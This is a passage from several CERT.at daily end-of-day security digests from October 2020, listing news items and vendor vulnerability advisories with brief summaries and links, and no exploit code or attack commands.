http://support.blackberry.com/kb/articleDetail?language=en_US&articleNumber…
∗∗∗ Security Bulletin: Multiple Vulnerabilities in Jackson Core affect IBM Maximo Asset Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: IBM Security Guardium Big Data Intelligence (SonarG) is affected by a 3RD PARTY Cryptographic vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-big…
∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to Authentication Bypass (CVE-2020-4493) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme…
∗∗∗ Security Bulletin: Vulnerabilities in Apache ActiveMQ affect IBM Operations Analytics Predictive Insights (CVE-2020-11998, CVE-2020-13920) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache…
∗∗∗ Security Bulletin: IBM Resilient SOAR could allow a privileged user to inject malicious commands through Python3 scripting (CVE-2020-4636). ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-soar-could-…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 14-10-2020 18:00 − Thursday 15-10-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Bleedingtooth: Google and Intel warn of new Bluetooth vulnerabilities ∗∗∗
---------------------------------------------
According to Google, the vulnerabilities allow code to be executed remotely. Intel published them before patches had been shipped.
---------------------------------------------
https://www.golem.de/news/bleedingtooth-google-und-intel-warnen-vor-neuen-b…
∗∗∗ Security Analysis of CHERI ISA ∗∗∗
---------------------------------------------
Is it possible to get to a state where memory safety issues would be deterministically mitigated? Our quest to mitigate memory corruption vulnerabilities led us to examine CHERI (Capability Hardware Enhanced RISC Instructions), which provides memory protection features against many exploited vulnerabilities, or in other words, an architectural solution that breaks exploits.
---------------------------------------------
https://msrc-blog.microsoft.com:443/2020/10/14/security-analysis-of-cheri-i…
∗∗∗ Magento Phishing Leverages JavaScript For Exfiltration ∗∗∗
---------------------------------------------
During a recent investigation, a Magento admin login phishing page was found on a compromised website using the file name wp-order.php. This is an odd file name choice for a Magento phishing page, but nevertheless it successfully loads a legitimate looking Magento 1.x login page.
---------------------------------------------
https://blog.sucuri.net/2020/10/magento-phishing-leverages-javascript-for-e…
∗∗∗ [SANS ISC] Nicely Obfuscated Python RAT ∗∗∗
---------------------------------------------
I published the following diary on isc.sans.edu: “Nicely Obfuscated Python RAT”: While hunting, I found an interesting Python script. It matched one of my YARA rules due to the interesting list of imports but the content itself was nicely obfuscated.
---------------------------------------------
https://blog.rootshell.be/2020/10/15/sans-isc-nicely-obfuscated-python-rat/
∗∗∗ Dockerfile Security Best Practices ∗∗∗
---------------------------------------------
Container security is a broad problem space and there are many low hanging fruits one can harvest to mitigate risks. A good starting point is to follow some rules when writing Dockerfiles.
---------------------------------------------
https://cloudberry.engineering/article/dockerfile-security-best-practices/
∗∗∗ QR code scams are making a comeback ∗∗∗
---------------------------------------------
With QR codes being used more as a means to help create a COVID-19 proof environment, we're also seeing a comeback of QR code scams.
---------------------------------------------
https://blog.malwarebytes.com/scams/2020/10/qr-code-scams-are-making-a-come…
∗∗∗ This major criminal hacking group just switched to ransomware attacks ∗∗∗
---------------------------------------------
A newly detailed financial cybercrime group has been conducting attacks around the world since 2016 - but now they've switched to ransomware because it's the biggest and easiest pay day.
---------------------------------------------
https://www.zdnet.com/article/this-major-criminal-hacking-group-just-switch…
∗∗∗ New Emotet attacks use fake Windows Update lures ∗∗∗
---------------------------------------------
Emotet diversifies arsenal with new lures to trick users into infecting themselves.
---------------------------------------------
https://www.zdnet.com/article/new-emotet-attacks-use-fake-windows-update-lu…
=====================
= Vulnerabilities =
=====================
∗∗∗ Drupal OAuth Server ( OAuth Provider) - Single Sign On ( SSO ) - Moderately critical - SQL Injection - SA-CONTRIB-2020-034 ∗∗∗
---------------------------------------------
Project: Drupal OAuth Server ( OAuth Provider) - Single Sign On ( SSO )
Date: 2020-October-14
Security risk: Moderately critical 12/25 AC:Basic/A:None/CI:None/II:Some/E:Theoretical/TD:Default
Vulnerability: SQL Injection
Description: This module enables you to log in to any OAuth 2.0 compliant application using Drupal credentials. The 8.x branch of the module is vulnerable to SQL injection.
Solution: Install the latest version: If you use the Drupal OAuth Server module for Drupal 8.x, upgrade to 8.x-1.1
---------------------------------------------
https://www.drupal.org/sa-contrib-2020-034
∗∗∗ Juniper Security Bulletins 2020-10 ∗∗∗
---------------------------------------------
JSA11045 - 2020-10 Security Bulletin: JSA Series: Intel CPUs could allow a local authenticated attacker to obtain sensitive information (CVE-2019-11135)
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11045
JSA11046 - 2020-10 Security Bulletin: Junos OS: FreeBSD-SA-20:03.thrmisc: kernel stack data disclosure (CVE-2019-15875)
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11046
JSA11047 - 2020-10 Security Bulletin: FreeBSD-SA-19:20.bsnmp : Insufficient message length validation in bsnmp library (CVE-2019-5610)
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11047
JSA11048 - 2020-10 Security Bulletin: Junos Space and Junos Space Security Director: Zombie POODLE and GOLDENDOODLE resolved in 20.2R1 release
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11048
JSA11049 - 2020-10 Security Bulletin: Junos OS: When a DHCPv6 Relay-Agent is configured upon receipt of a specific DHCPv6 client message, Remote Code Execution may occur. (CVE-2020-1656)
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11049
JSA11050 - 2020-10 Security Bulletin: Junos OS: SRX Series: An attacker sending spoofed packets to IPSec peers may cause a Denial of Service. (CVE-2020-1657)
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11050
JSA11053 - 2020-10 Security Bulletin: Junos OS: NFX Series: Multiple vulnerabilities resolved in 20.2R1 release
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11053
JSA11054 - 2020-10 Security Bulletin: Junos OS: MX Series: Receipt of specific packets can cause services card to restart when DNS filtering is configured. (CVE-2020-1660)
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11054
JSA11055 - 2020-10 Security Bulletin: Junos OS: Multiple SQLite vulnerabilities resolved.
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11055
JSA11056 - 2020-10 Security Bulletin: Junos OS: jdhcpd process crash when forwarding a malformed DHCP packet. (CVE-2020-1661)
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11056
JSA11062 - 2020-10 Security Bulletin: Junos OS: MX series/EX9200 Series: IPv6 DDoS protection does not work as expected. (CVE-2020-1665)
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11062
JSA11076 - 2020-10 Security Bulletin: Junos OS: PTX/QFX Series: Kernel Routing Table (KRT) queue stuck after packet sampling a malformed packet when the tunnel-observation mpls-over-udp configuration is enabled. (CVE-2020-1679)
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11076
JSA11079 - 2020-10 Security Bulletin: Junos OS: SRX1500, vSRX, SRX4K, NFX150: Denial of service vulnerability executing local CLI command (CVE-2020-1682)
---------------------------------------------
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11079
∗∗∗ Red Hat JBoss Enterprise Application Platform: Vulnerability allows denial of service ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0992
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Netcool Agile Service Manager ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Vulnerability in Hibernate Validator affects WebSphere Application Server Liberty (CVE-2020-10693) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-hibernat…
∗∗∗ Security Bulletin: Netcool Operations Insight component IBM Network Performance Insight 1.3.1 affected by CVE-2020-14195 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-netcool-operations-insigh…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM® SDK, Java™ Technology Edition affect IBM Operational Decision Manager ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Security Vulnerabilities in IBM WebSphere Liberty fixed in IBM Security Access Manager Appliance ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
∗∗∗ Security Bulletin: Netcool Operations Insight component IBM Network Performance Insight 1.3.1 affected by CVE-2020-14062 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-netcool-operations-insigh…
∗∗∗ Security Bulletin: Security Vulnerabilities have been identified in IBM Java Runtime as shipped with Tivoli Federated Identity Manager ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
∗∗∗ Security Bulletin: Vulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache…
∗∗∗ Security Bulletin: Netcool Operations Insight – Cloud Native Event Analytics is affected by an Apache Commons Codec vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-netcool-operations-insigh…
∗∗∗ Security Bulletin: Security vulnerabilities have been fixed in the IBM Security Access Manager and IBM Security Verify Access products ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 13-10-2020 18:00 − Wednesday 14-10-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Patch day: Current Microsoft updates prevent remote attacks ∗∗∗
---------------------------------------------
Active attacks on the partly critical vulnerabilities fixed on Patch Tuesday have not been observed so far. Updating promptly is still advisable.
---------------------------------------------
https://heise.de/-4928145
∗∗∗ Apple's T2 security chip: Exploit demonstrated in action ∗∗∗
---------------------------------------------
A team of hackers has demonstrated how the current security chip in the Mac can be cracked, using a simple manipulated USB-C cable.
---------------------------------------------
https://heise.de/-4928042
∗∗∗ Beware of phishing calls in the name of Magenta ∗∗∗
---------------------------------------------
Criminals are increasingly using the telephone to obtain personal data. Currently, fraudsters are posing as Magenta and trying to obtain the victims' customer password and other personal data by phone. Therefore, do not answer calls from the telephone number 0800799742!
---------------------------------------------
https://www.watchlist-internet.at/news/vorsicht-vor-phishing-anrufen-im-nam…
=====================
= Vulnerabilities =
=====================
∗∗∗ For Foxit's sake: Windows and Mac users alike urged to patch PhantomPDF over use-after-free vulns ∗∗∗
---------------------------------------------
CISA points spotlight at PDF reader 'n' creator suite. Windows and Mac users running Foxit's popular PhantomPDF reader should update their installations to the latest version after the US CISA cybersecurity agency warned of a handful of high-severity product vulnerabilities.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2020/10/13/foxit_phanto…
∗∗∗ October 2020 Patch Tuesday: Microsoft fixes potentially wormable Windows TCP/IP RCE flaw ∗∗∗
---------------------------------------------
On this October 2020 Patch Tuesday:
Microsoft has plugged 87 security holes, including critical ones in the Windows TCP/IP stack and Microsoft Outlook and Microsoft 365 Apps for Enterprise
Adobe has delivered security updates for Adobe Flash Player
Intel warns about flaws in BlueZ, the official Linux Bluetooth protocol stack
SAP has released 15 security notes and updates to 6 previously released ones.
---------------------------------------------
https://www.helpnetsecurity.com/2020/10/13/october-2020-patch-tuesday/
∗∗∗ SAP patch day: Top-rated flaw in CA Introscope Enterprise Manager fixed ∗∗∗
---------------------------------------------
SAP admins should promptly review the available security updates and install them where necessary. The risk rating "High" appears several times.
---------------------------------------------
https://heise.de/-4928265
∗∗∗ Vulnerability Spotlight: Information leak vulnerability in Google Chrome WebGL ∗∗∗
---------------------------------------------
Marcin Towalski of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw. The Google Chrome web browser contains a vulnerability that could be exploited by an adversary to carry out a range of malicious actions. Chrome is one of the most popular web browsers currently available to users. Cisco Talos researchers recently discovered a bug in WebGL, which is a Chrome API responsible for displaying 3-D graphics.
---------------------------------------------
https://blog.talosintelligence.com/2020/10/vuln-spotlight-chrome-web-gl-inf…
∗∗∗ SonicWall VPN Portal Critical Flaw (CVE-2020-5135) ∗∗∗
---------------------------------------------
Tripwire VERT has identified a stack-based buffer overflow in SonicWall Network Security Appliance (NSA). The flaw can be triggered by an unauthenticated HTTP request involving a custom protocol handler. The vulnerability exists within the HTTP/HTTPS service used for product management as well as SSL VPN remote access.
---------------------------------------------
https://www.tripwire.com/state-of-security/vert/sonicwall-vpn-portal-critic…
∗∗∗ Kubernetes AWS IAM Integration Issues ∗∗∗
---------------------------------------------
https://cxsecurity.com/issue/WLB-2020100083
∗∗∗ Red Hat JBoss Enterprise Application Platform: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0975
∗∗∗ Trend Micro AntiVirus for Mac: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0977
∗∗∗ Security Advisory - Denial of Service Vulnerability in Some Huawei Products ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201014-…
∗∗∗ Security Advisory - Buffer Overflow Vulnerability in the Bluetooth Module of Some Huawei Mobile Phones ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201014-…
∗∗∗ Security Advisory - Privilege Escalation Vulnerability in Some Huawei Smartphones ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201014-…
∗∗∗ Security Advisory - JavaScript Injection Vulnerability in Huawei Smartphone ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201014-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by a jackson-databind vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: Apache Derby as used by IBM QRadar SIEM is vulnerable to Improper Input Validation (CVE-2018-1313) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-apache-derby-as-used-by-i…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: Security Vulnerabilities have been fixed in IBM Security Access Manager ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
∗∗∗ Security Bulletin: Unzip as used by IBM QRadar SIEM is vulnerable to denial of service (CVE-2019-13232) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-unzip-as-used-by-ibm-qrad…
∗∗∗ Security Bulletin: IBM MQ Appliance is affected by an information disclosure vulnerability (CVE-2020-4528) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-appliance-is-affec…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 12-10-2020 18:00 − Tuesday 13-10-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Windows Update can be abused to execute malicious programs ∗∗∗
---------------------------------------------
The Windows Update client has just been added to the list of living-off-the-land binaries (LoLBins) attackers can use to execute malicious code on Windows systems.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/windows-update-can-be-abused…
∗∗∗ Attackers on US government networks combine "Zerologon" with further vulnerabilities ∗∗∗
---------------------------------------------
Vulnerabilities in FortiOS and MobileIron Core & Connector are being woven together with Zerologon into an exploit chain, CISA and the FBI warn.
---------------------------------------------
https://heise.de/-4927692
∗∗∗ 55 vulnerabilities discovered in Apple services ∗∗∗
---------------------------------------------
Five hackers received almost 300,000 US dollars in bug bounty rewards within a period of only 3 months
---------------------------------------------
https://www.welivesecurity.com/deutsch/2020/10/13/55-sicherheitsluecken-bei…
∗∗∗ Anatomy of Ryuk Attack: 29 Hours From Initial Email to Full Compromise ∗∗∗
---------------------------------------------
An attack involving the Ryuk ransomware required 29 hours from an email being sent to the target to full environment compromise and the encryption of systems, according to the DFIR Report, a project that provides threat intelligence from real attacks observed by its honeypots.
---------------------------------------------
https://www.securityweek.com/anatomy-ryuk-attack-29-hours-initial-email-ful…
∗∗∗ Study Finds 400,000 Vulnerabilities Across 2,200 Virtual Appliances ∗∗∗
---------------------------------------------
Virtual appliances, even if they are provided by major software or cybersecurity vendors, can pose a serious risk to organizations, according to a report published on Tuesday by cloud visibility firm Orca Security.
---------------------------------------------
https://www.securityweek.com/study-finds-400000-vulnerabilities-across-2200…
∗∗∗ Scamming schemes you should know about ∗∗∗
---------------------------------------------
Scamming is an umbrella term for numerous fraud schemes. But what is scamming? You have most likely already encountered this kind of fraud or at least heard of it! Here you can learn more about the most common advance-fee fraud schemes and how to protect yourself from them!
---------------------------------------------
https://www.watchlist-internet.at/news/diese-scamming-maschen-sollten-sie-k…
∗∗∗ Red team exposes IAM weaknesses ∗∗∗
---------------------------------------------
A red team from Palo Alto Networks has shown how attackers deliberately exploit gaps and misconfigurations in cloud identity and access management (IAM) to obtain critical information.
---------------------------------------------
https://www.zdnet.de/88388335/red-team-deckt-iam-schwaechen-auf/
=====================
= Vulnerabilities =
=====================
∗∗∗ Security Updates Available for Adobe Flash Player (APSB20-58) ∗∗∗
---------------------------------------------
Adobe has released security updates for Adobe Flash Player (APSB20-58) for Windows, macOS, Linux and Chrome OS. These updates address a vulnerability rated Critical in Adobe Flash Player. Successful exploitation could lead to an exploitable crash, potentially resulting in arbitrary code execution in the context of the current user.
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1925
∗∗∗ SSA-384879 (Last Update: 2020-10-13): Authentication Bypass Vulnerability in SIPORT MP ∗∗∗
---------------------------------------------
SIPORT MP version 3.2.1 fixes an authentication bypass vulnerability which could enable an attacker to impersonate other users of the system and perform administrative actions. Siemens recommends applying the update.
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-384879.txt
∗∗∗ SSA-226339 (Last Update: 2020-10-13): Multiple Web Application Vulnerabilities in Desigo Insight ∗∗∗
---------------------------------------------
The latest hotfix for Desigo Insight fixes three vulnerabilities that have been identified in the web server, including SQL injection (CVE-2020-15792), clickjacking (CVE-2020-15793), and full path disclosure (CVE-2020-15794). Siemens recommends updating to the latest version of Desigo Insight and applying the hotfix.
---------------------------------------------
https://cert-portal.siemens.com/productcert/txt/ssa-226339.txt
∗∗∗ Acronis Patches Privilege Escalation Flaws in Backup, Security Solutions ∗∗∗
---------------------------------------------
Acronis has released patches for its True Image, Cyber Backup, and Cyber Protect products to address vulnerabilities that could lead to elevation of privileges. The flaws could allow unprivileged Windows users to run code with SYSTEM privileges, a vulnerability note from the CERT Coordination Center (CERT/CC) reveals.
---------------------------------------------
https://www.securityweek.com/acronis-patches-privilege-escalation-flaws-bac…
∗∗∗ SAP Patch Day October 2020 ∗∗∗
---------------------------------------------
A remote, authenticated or anonymous attacker can exploit multiple vulnerabilities in SAP products and application components to compromise the confidentiality, availability and integrity of the applications.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0972
∗∗∗ Citrix Gateway Plug-in for Windows Security Update ∗∗∗
---------------------------------------------
Vulnerabilities have been identified in Citrix Gateway Plug-in for Windows that, if exploited, could result in a local user escalating their privilege level to SYSTEM.
---------------------------------------------
https://support.citrix.com/article/CTX282684
∗∗∗ IPAS: Security Advisories for October 2020 ∗∗∗
---------------------------------------------
Hi everyone, For October 2020, we are releasing just one security advisory addressing two vulnerabilities in the BlueZ open-source Bluetooth stack. Affected Linux users are encouraged to update to Linux kernel version 5.9 or later. More information can be found in INTEL-SA-00435 and at www.bluez.org.
---------------------------------------------
https://blogs.intel.com/technology/2020/10/ipas-security-advisories-for-oct…
∗∗∗ Remote Desktop Services Remote Code Execution Vulnerability in Rexroth Industrial PCs ∗∗∗
---------------------------------------------
BOSCH-SA-856281: Microsoft has published information [1] for several versions of Microsoft Windows XP, Microsoft Windows XP Embedded, Microsoft Windows 7 and Microsoft Windows 7 Embedded Standard regarding a vulnerability in the Remote Desktop Service. The vulnerability could allow an unauthenticated remote attacker to execute arbitrary code on the target system if the system exposes the service to the network. Rexroth Industrial PCs on these operating systems are affected by this vulnerability.
---------------------------------------------
https://psirt.bosch.com/security-advisories/bosch-sa-856281.html
∗∗∗ Webmin: Vulnerabilities allow cross-site scripting ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0973
∗∗∗ BSRT-2020-003 Vulnerability in UEM Core Impacts BlackBerry UEM ∗∗∗
---------------------------------------------
http://support.blackberry.com/kb/articleDetail?language=en_US&articleNumber…
∗∗∗ Security Bulletin: Cross-Site Scripting vulnerability affects IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4557 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln…
∗∗∗ Security Bulletin: Cross-site scripting vulnerability affects IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4698 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affecting Rational Functional Tester ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: Cross Site Scripting vulnerabilities in jQuery might affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-7656, CVE-2020-11022, CVE-2020-11023 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affecting Rational Functional Tester ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM SPSS Statistics ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
∗∗∗ Security Bulletin: Vulnerability in Docker affects Cloud Pak System (CVE-2020-13401) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-docker-a…
∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Qemu affects IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 09-10-2020 18:00 − Monday 12-10-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Sophisticated Android Ransomware Executes with the Home Button ∗∗∗
---------------------------------------------
The malware also has a unique machine-learning module.
---------------------------------------------
https://threatpost.com/android-ransomware-home-button/160001/
∗∗∗ Open Packaging Conventions, (Sat, Oct 10th) ∗∗∗
---------------------------------------------
Office files like .docx, .xlsm, ... are Office Open XML (OOXML) files: a ZIP container containing XML files and possibly other file types.
---------------------------------------------
https://isc.sans.edu/diary/rss/26662
∗∗∗ Operation TrickBot – a global strike against the botnet ∗∗∗
---------------------------------------------
ESET researchers supported the successful strike against one of the largest botnets and malware distributors.
---------------------------------------------
https://www.welivesecurity.com/deutsch/2020/10/12/operation-trickbot-eset-i…
∗∗∗ Deepfake Voice Technology Iterates on Old Phishing Strategies ∗∗∗
---------------------------------------------
As the world of AI and deepfake technology grows more complex, the risk that deepfakes pose to firms and individuals grows increasingly potent. This growing sophistication of the latest software and algorithms has allowed malicious hackers, scammers and cyber criminals who work tirelessly behind the scenes to stay one step ahead of the authorities, making [...]
---------------------------------------------
https://www.tripwire.com/state-of-security/featured/deepfake-voice-technolo…
∗∗∗ Beware of the fake shop sport-monkey.de! ∗∗∗
---------------------------------------------
Over the weekend, Watchlist Internet received countless reports about the online shop sport-monkey.de. It offers a wide range of sports equipment at almost unbelievable prices. The prices are so low for one single reason: it is a fake shop that does not deliver any goods despite payment in advance.
---------------------------------------------
https://www.watchlist-internet.at/news/vorsicht-vor-dem-fake-shop-sport-mon…
∗∗∗ Event Report - A convenient mechanism to edit, visualize and share reports ∗∗∗
---------------------------------------------
MISP is widely known as a powerful tool to gather, correlate and share information. As a response to the growing information-sharing maturity of the community, more features have been introduced over the past few years to meet analyst skills and requirements.
---------------------------------------------
https://www.misp-project.org/2020/10/08/Event-Reports.html
∗∗∗ Hackers exploit bugs in VPN and Windows Netlogon ∗∗∗
---------------------------------------------
Attackers gain access to government agency networks by deliberately exploiting vulnerabilities in VPN systems and Windows Netlogon.
---------------------------------------------
https://www.zdnet.de/88383319/hacker-nutzen-bugs-in-vpn-und-windows-netlogo…
=====================
= Vulnerabilities =
=====================
∗∗∗ Citrix Hypervisor Security Update ∗∗∗
---------------------------------------------
A previous version of this bulletin had links to hotfixes that addressed the security issues but caused stability issues for some deployments that were using the Hypervisor Introspection (HVI) functionality of Citrix Hypervisor. Customers who are not using HVI functionality and who have already applied the earlier updates need take no further action.
---------------------------------------------
https://support.citrix.com/article/CTX282314
∗∗∗ Atlassian Jira Software: Vulnerability allows cross-site scripting ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0970
∗∗∗ phpMyAdmin: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0969
∗∗∗ Reflected Cross-Site Scripting and Unauthenticated Malicious File Upload in Sage DPW ∗∗∗
---------------------------------------------
https://sec-consult.com/./en/blog/advisories/reflected-cross-site-scripting…
∗∗∗ Security Bulletin: IBM InfoSphere Information Server is vulnerable to HTML injection. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-infosphere-informatio…
∗∗∗ Security Bulletin: IBM QRadar SIEM is vulnerable to deserialization of untrusted data ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulner…
∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to an information disclosure. (CVE-2020-4386) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-…
∗∗∗ Security Bulletin: IBM InfoSphere Metadata Asset Manager is vulnerable to stored cross-site scripting. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-infosphere-metadata-a…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by an SQLite vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to buffer overflow leading to a privileged escalation (CVE-2020-4363) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-…
∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to an information disclosure and denial of service (CVE-2020-4414) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-…
∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to an information disclosure. (CVE-2020-4387) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-…
∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to a denial of service attack (CVE-2020-4420) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-…
∗∗∗ Security Bulletin: Security vulnerabilities have been identified in IBM DB2 shipped with IBM License Metric Tool v9. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 08-10-2020 18:00 − Friday 09-10-2020 18:00
Handler: Dimitri Robl
Co-Handler: Thomas Pribitzer
=====================
= News =
=====================
∗∗∗ Phishing kits as far as the eye can see, (Fri, Oct 9th) ∗∗∗
---------------------------------------------
If you've never delved too deep into the topic of phishing kits, you might quite reasonably expect them to be the sort of tools that are traded almost exclusively on dark web marketplaces. This is however not the case.
---------------------------------------------
https://isc.sans.edu/diary/rss/26660
∗∗∗ Firebase: Google Cloud’s Evil Twin - Excerpt ∗∗∗
---------------------------------------------
Firebase is the most popular developer tool that security has never heard of. We will bring its numerous flaws to light.
---------------------------------------------
https://www.sans.org/blog/firebase-google-cloud-s-evil-twin-condensed
∗∗∗ BSI team sweeps all prizes at the CHES Challenge ∗∗∗
---------------------------------------------
From 14 to 18 September 2020, the International Association for Cryptologic Research (IACR) held the Conference on Cryptographic Hardware and Embedded Systems (CHES). CHES is the world's largest and most renowned conference on hardware-oriented cryptography.
---------------------------------------------
https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2020/CHES-Challe…
∗∗∗ verbraucherclub.de: Warning about dubious advertisements! ∗∗∗
---------------------------------------------
